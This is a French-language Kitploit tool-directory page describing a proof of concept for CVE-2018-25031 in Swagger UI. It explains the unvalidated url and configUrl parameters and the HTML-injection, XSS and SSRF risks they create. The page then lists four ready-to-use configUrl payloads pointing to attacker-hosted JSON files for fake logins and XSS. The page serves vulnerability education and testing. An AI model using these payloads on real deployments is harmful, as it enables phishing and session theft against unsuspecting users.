Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS]. | Kitploit
Outils/GitHubGitHub/relichunt3r/swagger-ui
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Introduction : Le rôle de Swagger UI

Swagger UI est une bibliothèque largement utilisée qui rend les spécifications OpenAPI (anciennement Swagger) sous forme d'une interface web interactive. Elle permet aux développeurs et intégrateurs d'explorer et de tester des API sans avoir l'implémentation backend en place.

Détails de CVE‑2018‑25031

La cause racine : Chargement de spécifications distantes

La vulnérabilité provient d'une validation insuffisante des paramètres de requête URL utilisés pour charger des fichiers de configuration ou de spécifications distants par le client Swagger UI. Les paramètres courants impliqués sont :

  • ?url=.yaml
  • ?configUrl=.json

Un attaquant peut pointer ces paramètres vers une définition OpenAPI ou un fichier de configuration contrôlé par l'attaquant et hébergé à distance, qui peut être rendu par une instance vulnérable.

Vecteurs d'attaque potentiels

Le chargement d'un fichier distant malveillant peut permettre plusieurs conséquences à fort impact selon la configuration d'hébergement et les protections en place :

  1. Injection HTML (HTMLi) / Hameçonnage - les fichiers injectés peuvent contenir du HTML arbitraire qui usurpe visuellement le contenu (par exemple, de faux formulaires de connexion), abusant du domaine de confiance d'une instance auto-hébergée.
  2. Cross‑Site Scripting (XSS) - si le contenu injecté inclut du JavaScript exécutable, cela peut entraîner un XSS DOM et permettre le vol de session ou des actions au nom des utilisateurs.
  3. Server‑Side Request Forgery (SSRF) - lorsque les serveurs récupèrent des spécifications distantes au nom du client, un attaquant peut forcer le serveur à faire des requêtes vers des points d'accès internes, exposant potentiellement des ressources sensibles.

Références :

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

Preuve de concept (POC)

Charges utiles

1 - Connexion

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - Connexion distante

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - Image

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 Avertissement

Le contenu de ce dépôt est fourni à des fins éducatives et informatives uniquement. L'auteur n'est pas responsable de toute mauvaise utilisation. Assurez-vous d'avoir une autorisation appropriée avant utilisation, agissez de manière responsable à vos propres risques et suivez toutes les directives légales et éthiques.

Télécharger l’outil